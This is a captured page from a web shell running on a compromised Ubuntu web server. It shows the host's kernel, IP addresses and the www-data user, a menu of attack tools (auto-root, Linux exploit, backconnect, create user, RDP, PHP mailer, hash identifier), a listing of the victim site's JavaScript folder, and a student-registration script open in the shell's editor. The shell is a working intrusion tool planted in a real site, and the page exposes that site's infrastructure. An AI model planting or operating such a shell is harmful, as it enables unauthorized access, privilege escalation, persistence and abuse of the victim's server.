Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.71.102
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gcg /
adm /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
MainPage.js
58.89
KB
-rwxr-xr-x
MainPage_03082019.js
50.68
KB
-rwxr-xr-x
Registrationpage.js
1.8
KB
-rwxr-xr-x
admin.js
15.25
KB
-rwxr-xr-x
advanced-form-elements.js
5.41
KB
-rwxr-xr-x
appForm.js
13.62
KB
-rwxr-xr-x
appStatus.js
4.09
KB
-rwxr-xr-x
control.js
18.43
KB
-rwxr-xr-x
demo.js
3.33
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
helpers.js
576
B
-rwxr-xr-x
kusPhdAdm.js
13.07
KB
-rw-r--r--
login.js
1.06
KB
-rwxr-xr-x
printCor.js
0
B
-rwxr-xr-x
script.js
3
B
-rwxr-xr-x
validate.js
9.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Registrationpage.js
var studregno; //var $host_url="http://"+window.location.host+"/"+window.location.pathname.split('/')[1]+"/app.php?a="; var $host_url = "http://" + window.location.host + "/" + window.location.pathname.split("/")[1] + "/" + window.location.pathname.split("/")[2] + "/app.php?a="; function studentregno() { studregno = $("#studregno").val(); if (studregno === "") { $("#studregno_err").addClass("hasError"); return; } else { var datastring = "&studregno=" + studregno + "&page=registration"; $.ajax({ type: "POST", async: false, data: datastring, url: $host_url + "getRerigistrationDetails", success: function getsubjectdetResponce(responce) { responce = eval("(" + responce + ")"); if (responce.error_code === -1) { alert(responce.data.msg); } else { window.location.href = "MainPage.html?page=registration"; } } }); } } function getreprint() { var rappno = $("#rappno").val(); var rdob = $("#rdob").val(); var datastring = "&rappno=" + rappno + "&rdob=" + rdob; $.ajax({ type: "POST", url: $host_url + "getreprint", data: datastring, success: function(responce) { responce = eval("(" + responce + ")"); if (responce.error_code == 0) { if ( responce.data.html.fpaymenttype == "SBM" || responce.data.html.fpaymentstatus == "success" ) { window.location.href = $host_url + "PrintApplicationFormSBM&app_no=" + rappno; } else { alert("Payment Not Made."); return; } } else { alert("Invalid Details."); return; } } }); } function makepayment() { var rappno = $("#rappno").val(); window.location.href = "Paytm/pgRedirect.php?productinfo=" + rappno; }
Close